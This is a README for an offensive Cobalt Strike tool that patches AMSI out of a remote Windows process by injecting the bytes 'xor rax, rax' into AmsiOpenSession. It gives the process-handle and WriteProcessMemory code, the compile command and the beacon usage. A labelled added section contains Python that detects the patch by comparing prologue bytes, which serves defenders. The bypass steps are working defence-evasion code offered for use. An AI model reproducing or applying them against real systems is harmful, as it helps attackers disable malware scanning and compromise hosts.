source link: https://github.com/boku7/injectAmsiBypass
Cobalt Strike BOF - Inject AMSI Bypass
Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.
(Screenshot: Running the inject-amsiBypass BOF from Cobalt Strike)
What does this do?
1. Use supplied PID argument to get a handle on the remote process
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
2. Load AMSI.DLL into beacons memory and get the address of AMSI.AmsiOpenSession
- Both beacon and the target process will have the same address for the symbol.
- If AMSI.DLL is not loaded in the remote process, running this may crash the target process.
3. Write the AMSI bypass to the remote process's memory
unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax
BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten);
Method = AMSI.AmsiOpenSession
- Uses the AMSI bypass technique taught in Offensive Security's PEN-300/OSEP (Evasion Techniques and Breaching Defenses) course.
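The three steps above leave a detectable footprint: the first bytes of amsi!AmsiOpenSession in the target no longer match a clean copy of the export. The following is an added detection check, not code from the repository; check_prologue is pure comparison logic that runs anywhere, read_live_prologue is a hypothetical Windows-only helper that reads the prologue from a process by PID with the same same-address assumption the README states, and CLEAN_SAMPLE / PATCHED_SAMPLE are constructed bytes, not real amsi.dll code.

```python
import ctypes
import sys

# Bytes the BOF writes over the start of AmsiOpenSession: xor rax, rax
XOR_RAX_RAX = bytes([0x48, 0x31, 0xC0])

def check_prologue(live: bytes, clean: bytes, n: int = 16) -> dict:
    """Compare the first n bytes of amsi!AmsiOpenSession read from a live
    process with a known-good copy; any difference means it was patched."""
    live, clean = live[:n], clean[:n]
    if min(len(live), len(clean)) < len(XOR_RAX_RAX):
        raise ValueError("need at least 3 bytes of each prologue")
    first_diff = next((i for i, (a, b) in enumerate(zip(live, clean)) if a != b), None)
    return {
        "patched": live != clean,                      # generic tamper verdict
        "xor_rax_rax": live.startswith(XOR_RAX_RAX),   # this BOF's exact patch
        "first_diff": first_diff,                      # offset of first changed byte
    }

if sys.platform == "win32":
    from ctypes import wintypes

    def read_live_prologue(pid: int, n: int = 16) -> tuple:
        """Return (live, clean): the first n bytes of AmsiOpenSession inside
        process pid, and the same bytes from amsi.dll mapped into this scanner.
        Uses the fact the README relies on: the export sits at the same address
        in every process of the current boot (DLL bases are randomized per boot)."""
        k32 = ctypes.WinDLL("kernel32", use_last_error=True)
        k32.OpenProcess.restype = wintypes.HANDLE
        k32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
        k32.ReadProcessMemory.argtypes = [wintypes.HANDLE, wintypes.LPCVOID, wintypes.LPVOID,
                                          ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
        k32.CloseHandle.argtypes = [wintypes.HANDLE]
        PROCESS_VM_READ, PROCESS_QUERY_INFORMATION = 0x0010, 0x0400
        addr = ctypes.cast(ctypes.WinDLL("amsi").AmsiOpenSession, ctypes.c_void_p).value
        clean = ctypes.string_at(addr, n)              # our own, freshly mapped copy
        hproc = k32.OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, False, pid)
        if not hproc:
            raise ctypes.WinError(ctypes.get_last_error())
        buf, got = ctypes.create_string_buffer(n), ctypes.c_size_t()
        ok = k32.ReadProcessMemory(hproc, addr, buf, n, ctypes.byref(got))
        k32.CloseHandle(hproc)
        if not ok:
            raise ctypes.WinError(ctypes.get_last_error())
        return buf.raw[:got.value], clean

# Constructed sample bytes (not real amsi.dll code) so the check runs anywhere
CLEAN_SAMPLE = bytes(range(0x40, 0x50))
PATCHED_SAMPLE = XOR_RAX_RAX + CLEAN_SAMPLE[3:]
```

The scanner's own mapped copy is only a trustworthy baseline if the scanner process itself has not been patched; taking the clean bytes from the export in the on-disk amsi.dll removes that dependency.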
Proof of Concept Demo Screenshots
(Screenshot: Before - Powershell.exe AMSI.AmsiOpenSession)
(Screenshot: After - Powershell.exe AMSI.AmsiOpenSession)
Compile with x64 MinGW:
x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o
Run from Cobalt Strike Beacon Console
beacon> inject-amsiBypass <PID>
- Make sure to load the inject-amsiBypass.cna script into Cobalt Strike's Script Manager
To Do List
- Check that AMSI.DLL exists in remote process before injection
- Add other AMSI bypasses to inject
- Support x86
Credits / References
Raphael Mudge - Beacon Object Files - Luser Demo
Cobalt Strike - Beacon Object Files
BOF Code References
ajpc500/BOFs
trustedsec/CS-Situational-Awareness-BOF
Sektor7 Malware Dev Essentials course
Offensive Security OSEP